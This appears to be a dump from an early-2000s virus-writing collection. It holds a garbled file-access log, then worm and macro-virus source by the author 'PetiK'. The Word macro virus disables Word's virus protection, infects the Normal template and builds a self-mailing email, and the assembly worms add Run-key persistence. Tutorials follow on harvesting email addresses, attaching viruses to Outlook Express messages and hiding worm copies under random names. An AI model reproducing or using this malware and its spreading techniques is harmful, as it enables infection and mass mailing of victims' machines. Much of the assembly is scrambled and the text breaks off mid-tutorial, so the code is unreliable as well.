18:49:45 18:49:50 18:51:14 18:51:14 18:51:14 18:51:14 18:51:14 18:51:18 18:51:29 18:51:29 18:51:29 18:51:29 18:51:29 18:51:33 18:51:55 18:51:55 18:51:55 18:51:55 18:51:55 18:52:02 18:52:02 18:52:02 18:52:02 18:52:02 18:52:02 18:52:07 18:52:36 18:52:36 18:52:36 18:52:36 18:52:36 18:52:42 18:52:42 18:52:42 18:52:43 18:52:43 18:52:43 18:52:47 18:54:57 18:55:00 18:55:05 18:55:06 18:55:07 18:55:13 18:56:11 18:56:13 18:56:15 18:56:15 18:56:17 18:56:23 19:00:10 19:00:12 19:00:13 19:00:13 19:00:14 19:00:24 19:00:35 19:00:36 19:00:38 19:00:38 19:00:39 19:04:07 19:04:07 19:04:07 19:04:07 19:04:07 19:04:11 19:04:24 19:04:25 19:04:25 19:04:25 19:04:25 19:04:28 19:04:28 19:04:28 19:04:28 19:04:31 19:05:10

=> => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => =>

C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\WinHelp.htm C:\WINDOWS\TEMP\RND130.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\WINDOWS\TEMP\RND130.htm C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\Eigene Dateien\WinHelp.htm C:\Eigene Dateien\hrecmd.html C:\Eigene Dateien\hobby.html C:\Eigene Dateien\hhobby.html C:\Eigene Dateien\htalent.html C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\Eigene Dateien\INC Fichier.doc C:\Eigene Dateien\INTERNETAPI.doc C:\Eigene Dateien\VBSStarmania.doc C:\Eigene Dateien\SevenSource.doc C:\Eigene Dateien\WinHelp.htm C:\Eigene Dateien\hrecmd.html C:\Eigene Dateien\hobby.html C:\Eigene Dateien\hhobby.html C:\Eigene Dateien\htalent.html C:\Eigene Dateien\INCFile.doc C:\WINDOWS\WinHelp.htm

28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01

19:05:11 19:05:11 19:05:11 19:05:11 19:05:15 19:05:28 19:05:28 19:05:29 19:05:29 19:05:29 19:05:35 19:05:35 19:05:35 19:05:36 19:05:39 18:52:58 18:52:59 18:52:59 18:52:59 18:52:59 18:53:03 18:53:17 18:53:18 18:53:23 18:53:23 18:53:24 18:53:25 18:53:26 18:53:26 18:53:26 18:53:29 18:54:28 18:54:28 18:54:28 18:54:29 18:54:29 18:54:33 18:54:47 18:54:47 18:54:50 18:54:50 18:54:50 18:54:52 18:54:52 18:54:52 18:54:52 18:54:56 18:56:14 18:56:14 18:56:14 18:56:14 18:56:15 18:56:19 18:56:34 18:56:34 18:56:37 18:56:38 18:56:38 18:56:40 18:56:40 18:56:40 18:56:40 18:56:44 19:04:58 19:04:58 19:04:58 19:04:58 19:04:58 19:05:02 19:05:18 19:05:18 19:05:21 19:05:22 19:05:22 19:05:23 19:05:23 19:05:23 19:05:23

=> => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => =>

C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\Eigene Dateien\INC Fichier.doc C:\Eigene Dateien\INTERNETAPI.doc C:\Eigene Dateien\VBSStarmania.doc C:\Eigene Dateien\SevenSource.doc C:\Eigene Dateien\WinHelp.htm C:\Eigene Dateien\hrecmd.html C:\Eigene Dateien\hobby.html C:\Eigene Dateien\hhobby.html C:\Eigene Dateien\htalent.html C:\Eigene Dateien\INCFile.doc C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\Eigene Dateien\INC Fichier.doc C:\Eigene Dateien\INTERNETAPI.doc C:\Eigene Dateien\VBSStarmania.doc C:\Eigene Dateien\SevenSource.doc C:\Eigene Dateien\WinHelp.htm C:\Eigene Dateien\hrecmd.html C:\Eigene Dateien\hobby.html C:\Eigene Dateien\hhobby.html C:\Eigene Dateien\htalent.html C:\Eigene Dateien\INCFile.doc C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\Eigene Dateien\INC Fichier.doc C:\Eigene Dateien\INTERNETAPI.doc C:\Eigene Dateien\VBSStarmania.doc C:\Eigene Dateien\SevenSource.doc C:\Eigene Dateien\WinHelp.htm C:\Eigene Dateien\hrecmd.html C:\Eigene Dateien\hobby.html C:\Eigene Dateien\hhobby.html C:\Eigene Dateien\htalent.html C:\Eigene Dateien\INCFile.doc C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\Eigene Dateien\INC Fichier.doc C:\Eigene Dateien\INTERNETAPI.doc C:\Eigene Dateien\VBSStarmania.doc C:\Eigene Dateien\SevenSource.doc C:\Eigene Dateien\WinHelp.htm C:\Eigene Dateien\hrecmd.html C:\Eigene Dateien\hobby.html C:\Eigene Dateien\hhobby.html C:\Eigene Dateien\htalent.html C:\Eigene Dateien\INCFile.doc C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\Eigene Dateien\INC Fichier.doc C:\Eigene Dateien\INTERNETAPI.doc C:\Eigene Dateien\VBSStarmania.doc C:\Eigene Dateien\SevenSource.doc C:\Eigene Dateien\WinHelp.htm C:\Eigene Dateien\hrecmd.html C:\Eigene Dateien\hobby.html C:\Eigene Dateien\hhobby.html C:\Eigene Dateien\htalent.html

30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01 30.11.01

19:05:27 19:07:13 19:07:14 19:07:14 19:07:14 19:07:14 19:07:19 19:07:44 19:07:44 19:07:45 19:07:45 19:07:46 19:07:46 19:07:46 19:07:46 19:07:50 19:09:04 19:09:05 19:09:05 19:09:05 19:09:05 19:09:09 19:09:26 19:09:26 19:09:27 19:09:27 19:09:27 19:09:27 19:09:27 19:09:27 19:09:31 19:15:20 19:15:21 19:15:21 19:15:21 19:15:21 19:15:25 19:15:39 19:15:40 19:15:40 19:15:40 19:15:40 19:15:40 19:15:40 19:15:40 19:15:44 19:16:09 19:16:10 19:16:10 19:16:10 19:16:10 19:16:15 19:16:30 19:16:31 19:16:31 19:16:31 19:16:31 19:16:32 19:16:32 19:16:32 19:16:35

=> => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => => =>

C:\Eigene Dateien\INCFile.doc C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\Eigene Dateien\INC Fichier.doc C:\Eigene Dateien\INTERNETAPI.doc C:\Eigene Dateien\SevenSource.doc C:\Eigene Dateien\WinHelp.htm C:\Eigene Dateien\hrecmd.html C:\Eigene Dateien\hobby.html C:\Eigene Dateien\hhobby.html C:\Eigene Dateien\htalent.html C:\Eigene Dateien\INCFile.doc C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\Eigene Dateien\INC Fichier.doc C:\Eigene Dateien\INTERNETAPI.doc C:\Eigene Dateien\SevenSource.doc C:\Eigene Dateien\WinHelp.htm C:\Eigene Dateien\hrecmd.html C:\Eigene Dateien\hobby.html C:\Eigene Dateien\hhobby.html C:\Eigene Dateien\htalent.html C:\Eigene Dateien\INCFile.doc C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\Eigene Dateien\INC Fichier.doc C:\Eigene Dateien\INTERNETAPI.doc C:\Eigene Dateien\SevenSource.doc C:\Eigene Dateien\WinHelp.htm C:\Eigene Dateien\hrecmd.html C:\Eigene Dateien\hobby.html C:\Eigene Dateien\hhobby.html C:\Eigene Dateien\htalent.html C:\Eigene Dateien\INCFile.doc C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\Eigene Dateien\INC Fichier.doc C:\Eigene Dateien\INTERNETAPI.doc C:\Eigene Dateien\SevenSource.doc C:\Eigene Dateien\WinHelp.htm C:\Eigene Dateien\hrecmd.html C:\Eigene Dateien\hobby.html C:\Eigene Dateien\hhobby.html C:\Eigene Dateien\htalent.html C:\Eigene Dateien\INCFile.doc

'VBS.Cachemire 'On error resume next fs="FileSystemObject" sc="Scripting" wsc="WScript" sh="Shell" crlf=Chr(13)&Chr(10) Set fso=CreateObject(sc & "." & fs) Set ws=CreateObject(wsc & "." & sh) Set win=fso.GetSpecialFolder(0) Set sys=fso.GetSpecialFolder(1) Set tmp=fso.GetSpecialFolder(2) desk=ws.SpecialFolders("Desktop") strp=ws.SpecialFolders("StartUp") Set fl=fso.OpenTextFile(WScript.ScriptFullName,1) wrm=fl.ReadAll fl.Close If WScript.ScriptFullName <> sys&"\MsBackup.vbs" Then MsgBox "Sorry but the file """ & WScript.ScriptName & """ is not a valid VBS file",vbcritical,"ALERT" 'fso.GetFile(WScript.ScriptFullName).Copy(sys&"\MsBackup.vbs") 'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MsBackup",sys&"\MsBackup.vbs" Else End If

comment $ Name : I-Worm.Lauli Author : PetiK Date : 7th June 2002 $ .586p .model flat .code JUMPS api endm include useful.inc st_worm:push 50 mov esi,offset org_wrm push esi push 0 api GetModuleFileNameA mov push push push api add mov stosd mov stosd mov stosd pop ;cop: ; ; ; ;reg: ; ; ; ; ; ; push push push api edi,offset cpy_wrm edi 50 edi GetSystemDirectoryA edi,eax eax,"WsM\" eax,"kcos" eax,"exe." edi 0 edi esi CopyFileA macro a extrn a:proc call a

push 50 push edi push 1 @pushsz "Wsock32" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h api SHSetValueA push 0 push 80h push 3 push 0 push 1 push 80000000h @pushsz "code.txt" inc eax je end_cr_vbs dec eax xchg eax,ebx xor push push push push push push api test je xchg push

;push offset org_wrm

eax,eax eax eax eax 2 eax ebx CreateFileMappingA eax,eax end_vbs1 eax,ebp 40h

@pushsz "OK" @pushsz "OK" push 0 api MessageBoxA xor push push push push push api test je push push api mov eax,eax eax eax eax 4 ebp MapViewOfFile eax,eax end_vbs2 0 ebx GetFileSize [size],eax

chk_byte: mov edi,offset hex push edi p_c: lodsb call convert stosb dec size cmp size,0 jnz p_c pop edi push 40h @pushsz "Hex String:" push edi push 0 api MessageBoxA end_vbs3: push esi api UnmapViewOfFile end_vbs2: push ebp api CloseHandle end_vbs1: push ebx api CloseHandle end_cr_vbs: end_worm: push api 0 ExitProcess

convert: push ecx push edi xor ecx,ecx mov cl,al push ecx shr cl,4 lea edi,hex_table inc cl @@y: inc edi dec cl jnz @@y dec edi mov al, byte ptr [edi] pop ecx and cl,0Fh lea edi,hex_table inc cl @@x: inc edi dec cl jnz @@x dec edi mov ah,byte ptr [edi] pop edi

pop ret .data cpy_wrm org_wrm size hex_table hex end st_worm end

ecx

db 50 dup (0) db 50 dup (0) dd ? db "012345789ABCDEF",0 db 5000 dup (?)

Private Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, nSize As Long) As Long Sub AutoOpen() Call FuckProtection Call InfectWord Call CreateEML End Sub Sub InfectWord() On Error Resume Next Set nor = NormalTemplate.VBProject.VBComponents Set doc = ActiveDocument.VBProject.VBComponents srcvir = "C:\calli.drv" If nor.Item("Calli").Name <> "Calli" Then doc("Calli").Export srcvir nor.Import srcvir End If If doc.Item("Calli").Name <> "Calli" Then nor("Calli").Export srcvir doc.Import srcvir ActiveDocument.Save End If Kill (srcvir) End Sub Sub FuckProtection() With Options .ConfirmConversions = False .VirusProtection = False .SaveNormalPrompt = False End With Select Case Application.Version Case "10.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1& System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1& Case "9.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& End Select WordBasic.DisableAutoMacros 0 End Sub Sub CreateEML() Dim strUserName As String strUserName = String(100, Chr$(0)) GetUserName strUserName, 100 strUserName = Left$(strUserName, InStr(strUserName, Chr$(0)) - 1) bound = "" For i = 1 To 17 Randomize (Timer) bound = bound + Chr(Int(Rnd(1) * 8) + 48) Next eml1 = "To: """ & strUserName & "@microsoft.com""" & vbCrLf & _ "Subject: Hello You..." & vbCrLf & _ "Date: " & Hour(Now) & ":" & Minute(Now) & ":" & Second(Now) & " +0200" & vbCrLf & _ "MIME-Version: 1.0" & vbCrLf & _ "Content-Type: multipart/mixed;" & vbCrLf & _ vbTab & "boundary = ""----=_NextPart_" & bound & """" & vbCrLf & _ "X-Priority: 3" & vbCrLf & _ "X -MSMail - Priority: Normal" & vbCrLf & _ "X-Unsent: 1" & vbCrLf & _ "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000" & vbCrLf & vbCrLf & _ "This is a multi-part message in MIME format." & vbCrLf & vbCrLf eml2 = "------=_NextPart_" & bound & vbCrLf & _ "Content-Type: text/plain;" & vbCrLf & _

vbTab & "Charset=""iso-8859-1""" & vbCrLf & _ "Content-Transfer-Encoding: 7bit" & vbCrLf & vbCrLf & _ "Hello my friend, this is a funny file for you" & vbCrLf & vbCrLf & _ vbTab & vbTab & "Best Regards" & vbCrLf & vbCrLf & vbCrLf eml3 = "------=_NextPart_" & bound & vbCrLf & _ "Content-Type: application/x-msdownload;" & vbCrLf & _ vbTab & "name = ""Only_For_You.doc""" & vbCrLf & _ "Content -Transfer - Encoding: base64" & vbCrLf & _ "Content-Disposition: attachment;" & vbCrLf & _ vbTab & "fileName = ""Only_For_You.doc""" & vbCrLf & vbCrLf eml4 = EncodeBase64(ActiveDocument.FullName) eml5 = vbCrLf & "------=_NextPart_" & bound Open "hello.eml" For Output As #1 Print #1, eml1 & eml2 & eml3 & eml4 & eml5 Close #1 End Sub Private Function EncodeBase64(ByVal vsFullPathname As String) As String On Error Resume Next Dim b As Integer Dim Base64Tab As Variant Dim bin(3) As Byte Dim s As String Dim l As Long Dim i As Long Dim FileIn As Long Dim sResult As String Dim n As Long Base64Tab = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/") Erase bin l = 0: i = 0: FileIn = 0: b = 0: s = "" FileIn = FreeFile Open vsFullPathname For Binary As FileIn sResult = s & vbCrLf s = "" l = LOF(FileIn) - (LOF(FileIn) Mod 3) For i = 1 To l Step 3 Get FileIn, , bin(0) Get FileIn, , bin(1) Get FileIn, , bin(2) If Len(s) > 72 Then s = s & vbCrLf sResult = sResult & s s = "" End If b = (bin(n) \ 4) And &H3F s = s & Base64Tab(b) b = ((bin(n) And &H3) * 16) Or ((bin(1) \ 16) And &HF) s = s & Base64Tab(b) b = ((bin(n + 1) And &HF) * 4) Or ((bin(2) \ 64) And &H3) s = s & Base64Tab(b) b = bin(n + 2) And &H3F s = s & Base64Tab(b)

Next i If Not (LOF(FileIn) Mod 3 = 0) Then For i = 1 To (LOF(FileIn) Mod 3) Get FileIn, , bin(i - 1) Next i If (LOF(FileIn) Mod 3) = 2 Then b = (bin(0) \ 4) And &H3F s = s & Base64Tab(b) b = ((bin(0) And &H3) * 16) Or ((bin(1) \ 16) And &HF) s = s & Base64Tab(b) b = ((bin(1) And &HF) * 4) Or ((bin(2) \ 64) And &H3) s = s & Base64Tab(b) s = s & "=" Else b = (bin(0) \ 4) And &H3F s = s & Base64Tab(b) b = ((bin(0) And &H3) * 16) Or ((bin(1) \ 16) And &HF) s = s & Base64Tab(b) s = s & "==" End If End If If s <> "" Then s = s & vbCrLf sResult = sResult & s End If s = "" Close FileIn EncodeBase64 = sResult End Function

comment * Name : I-Worm.DieWorm Author : PetiK Date : July 10th 2002 Language : win32asm * .586p .model flat .code JUMPS include api endm start: get_name: push mov push push api 50 esi,offset orgwrm esi 0 GetModuleFileNameA useful.inc

macro a extrn a:proc call a

get_copy_name: mov edi,offset cpywrm push edi push 50 push edi api GetWindowsDirectoryA add edi,eax mov eax,'acs\' stosd mov eax,'renn' stosd mov eax,'exe.' stosd pop edi copy_worm: ; push ; push ; push ; api ; ; ; ; ; ; ; 0 edi esi CopyFileA

push 50 push edi push 1 @pushsz "ScanW32" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h api SHSetValueA push push push push push push push api inc je dec xchg push push push push push 0 0 3 0 1 80000000h offset orgwrm CreateFileA eax end_worm eax ebx,eax 0 0 0 2 0

push api test je xchg push push push push push api test je xchg push push api mov

ebx CreateFileMappingA eax,eax end_w1 eax,ebp 0 0 0 4 ebp MapViewOfFile eax,eax end_w2 eax,esi 0 ebx GetFileSize [size],eax

push 40h @pushsz "Hello" @pushsz "Hello" push 0 api MessageBoxA push 0 push 80h push 2 push 0 push 1 push 40000000h @pushsz "essai.txt" api CreateFileA mov [hvba],eax @start_hex: mov cnt,0 mov edi,offset dochex push edi @pushsz "e = e & """ push offset dochex api lstrcat pop edi push push push push push api push api 0 offset byte 112 offset dochex [hvba] WriteFile [hvba] CloseHandle

f_hex: end_w3: push esi api UnmapViewOfFile end_w2: push ebp api CloseHandle end_w1: push ebx api CloseHandle

end_worm: push api

0 ExitProcess

conv_hex: PUSH ECX PUSH EDI XOR ECX, ECX

MOV CL, AL PUSH ECX SHR CL, 04h LEA EDI, Tab_Hex INC CL @@Y: INC EDI DEC CL JNZ @@Y DEC MOV POP AND LEA INC EDI AL, BYTE PTR [EDI] ECX CL, 0Fh EDI, Tab_Hex CL

@@X: INC EDI DEC CL JNZ @@X DEC MOV POP POP RET EDI AH, BYTE PTR [EDI] EDI ECX

.data orgwrm cpywrm dochex hfile dd ? hvba dd ? byte dd 0 size dd ? cnt dd ? Tab_Hex db ends end start

db 50 dup (0) db 50 dup (0) db 112 dup (0)

"0123456789ABCDEF", 00h

=== How to spread a worm ? === === by PetiK (09/17/2001) === ################### #FIND SOME ADDRESS# ################### The most difficult to spread a worm is to find some address. There are in the computer, a lot of file which stock address. *.WAB file (Windows AddressBook): --------------------------------We can find this sort of file in the default value of HKEY_CURRENT_USER\Software\Microsoft\Wab\WAB4\Wab File Name. Look at the source of Win32.HiV coded by Benny to examine the mechanism. For this sort of file, I use an other technic. I create in the C:\ a vbs file. This vbs file will search all email in the Oultook Address Book and save them in a file in the WINDOWS or SYSTEM folder. This file afterwards is scanned by the worm (look at the source of I-Worm.Passion or I-Worm.Rush). *.HTM, *.HTML (Internet files): ------------------------------Windows is full of this sort of file but the problem is that they don't contain a lot of address. The solution is to scan all *.HTM and *.HTML files in the MSIE Cache Directory. We can use the api SHGetSpecialFolderPathA in the DLL file SHELL32.dll (20h). We can use regedit too. The address is the following : HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache. *.EML file (Outlook Express file): ---------------------------------We can found some address in a email ready to send. *This is the start of a eml file (Outlook Express) From: "PetiKVX" <petikvx@multimania.com> To: <victim@multimania.com> <= We have our address Subject: Virus Spread Date: Sun, 16 Sep 2001 20:54:11 +0200 MIME-Version: 1.0 To take this address, we search the string "To: <" in *.eml and we take the address ################# #SPREAD THE WORM# ################# I have imagined something to insert a virus/worm/trojan in a mail which contain already an attachment. We're going to use *.eml file again This is the appearance of a EML file : From: "PetiKVX" <petikvx@multimania.com> To: <victim@multimania.com> Subject: Virus Spread Date: Sun, 16 Sep 2001 20:54:11 +0200 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0008_01C13EF1.BF420560" "boundary" ------=_NextPart_001_0009_01C13EF1.BF420560 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable This is a new virus <= This is the body of mail <= We can add something (text, script ??)

<= The string of the

------=_NextPart_000_0008_01C13EF1.BF420560 Content-Type: application/x-msdownload; name="Winpopup.exe" Content-Transfer-Encoding: base64 Content-Disposition: attachment;

filename="Winpopup.exe"

<= This is a first attachment

HGiAAAAAAAaACgAAAAAA5gUNADAcP4AAAAAA8wUFADAcQIAAAAAA+AUzADAcQoAAAAAAKwZpADAc Q4AAAAAAlAYLADAcRIAAAAAAnwYJADAcvIAAAAAAqAYLADAcFIEAAAAAswYEADAcFYEAAAAAtwYF ADAcFoEAAAAAvAYDADAcZYAAAAAACYABAAAAAAC/BgMAMAzcgAAAAAAKgAEAAAAAAMIGAQAwHKoB AAAAABCAAQAAAAAAwwYfADAMAYAAAAAAA4AGAAAAAACMBC8AEBwBgAAAAAC7BBMAEBwCgAAAAADR ------=_NextPart_000_0008_01C13EF1.BF420560 <= Delete "--" at the end of the string Content-Type: application/x-msdownload; \ name="virus.exe" | Content-Transfer-Encoding: base64 |<= This our virus that we want attached. Content-Disposition: attachment; |<= The file is of course encode with the filename="virus.exe" |<= Encode64 system. --------------------------------TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA| AAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2lu| MzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA| AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA| |-------------------------------| ------=_NextPart_000_0008_01C13EF1.BF420560-/ To attached a file with this way, we must read the "boundary". Here it is the string "----=_NextPart_000_0008_01C13EF1.BF420560". We must delete "--" after the last "boundary" before infection. Like this the mail will contain the second attached Warning !! We must add "--" before and AFTER the LAST "boundary" to mark the end of the mail.

There we are ! If you have suggest, please mail me to petikvx@multimania.com. You can visit my siteweb : http://www.petikvx.fr.fm

=== Some Practice Technics === == by PetiK (02/10/2002) === ############### #Introduction:# ############### This article presents some technics that I use for my worm. I don't code very well like other coderz (Benny, GriYO, Bumblebee ,etc...) but I want to show what I know to do. Each part will be accompagny of a code source. Summary: I:Hide a copy of worm II:Spread a worm into different drives III:Extract API from KERNEL32.DLL library ######################## #I:Hide a copy of worm:# ######################## When I read a new description of worm, I note that he uses a static name like services.exe (XTC), winmine.exe (Chainsaw), wsock2.dll (Icecubes). It's practice because of the name but to delete the worm it's practice too. So my idea was to change in each start the name of the worm. How ?? Easy. First: create push mov push push api a random name into %windir% or %sysdir% directory : 50 esi,offset orig_worm esi 0 GetModuleFileNameA

mov edi,offset copy_worm push edi push 50 push edi api GetSystemDirectoryA add edi,eax mov al,"\" stosb api GetTickCount \ push 9 | pop ecx | xor edx,edx div ecx | inc edx | mov ecx,edx copy_g: push ecx | api GetTickCount | push 'z'-'a' pop ecx | xor edx,edx div ecx ---xchg eax,edx add al,'a' | stosb | api GetTickCount | push 100 | pop ecx | xor edx,edx div ecx | push edx | api Sleep | pop ecx | loop copy_g | mov eax,"exe." | stosd | pop edi /

Thanx to Benny for this | | | | \ Example of random name: / jwvv.exe, abgqlbg.exe, slb.exe

| If we don't sleep the name look like: ggggggg.exe, hhhhhhhh.exe uuuuuuu.exe

Second: Put the original name into @pushsz "C:\WINDOWS\WININIT.INI" push offset orig_name @pushsz "NUL" @pushsz "rename" api WritePrivateProfileStringA Third: Copy of the worm: push 0 push edi

Wininit.ini to delete him in the next start: \ | [rename] >--- NUL=orig_name | /

; copy name

push api

esi CopyFileA

; original name

Fourth: Register the name into Win.ini to active him in the next start: push edi ; copy name @pushsz "RUN" @pushsz "WINDOWS" api WriteProfileStringA -----------------------source----------------------.586p .model flat .code JUMPS api macro a extrn a:proc call a endm include Useful.inc start_worm: push mov push push api 50 esi,offset orig_worm esi 0 GetModuleFileNameA

mov edi,offset copy_worm push edi push 50 push edi api GetSystemDirectoryA add edi,eax mov al,"\" stosb api GetTickCount push 9 pop ecx xor edx,edx div ecx inc edx mov ecx,edx copy_g: push ecx api GetTickCount push 'z'-'a' pop ecx xor edx,edx div ecx xchg eax,edx add al,'a' stosb api GetTickCount push 100 pop ecx xor edx,edx div ecx push edx api Sleep pop ecx loop copy_g mov eax,"exe." stosd pop edi push push push push api 40h offset copy_worm edi 0 MessageBoxA

push 50 push offset wininit api GetWindowsDirectoryA @pushsz "\WININIT.INI"

push offset wininit api lstrcat push offset wininit push esi @pushsz "NUL" @pushsz "rename" api WritePrivateProfileStringA copy_w: push push api push 0 edi esi CopyFileA

run_w: push edi @pushsz "RUN" @pushsz "WINDOWS" api WriteProfileStringA end_worm: push api .data copy_worm orig_worm wininit 0 ExitProcess db 50 dup (0) db 50 dup (0) db 50 dup (0)

end start_worm end -----------------------source-----------------------

######################################## #II:Spread a worm into different drives# ######################################## One copy good is, many copies better are. In fact, we can create a sort of "backup" of the worm into different drives of the system. It's easy to code this (too easy perhaps). start_worm: push mov push push api 50 esi,offset orig_worm esi 0 GetModuleFileNameA

; Take the name of the worm

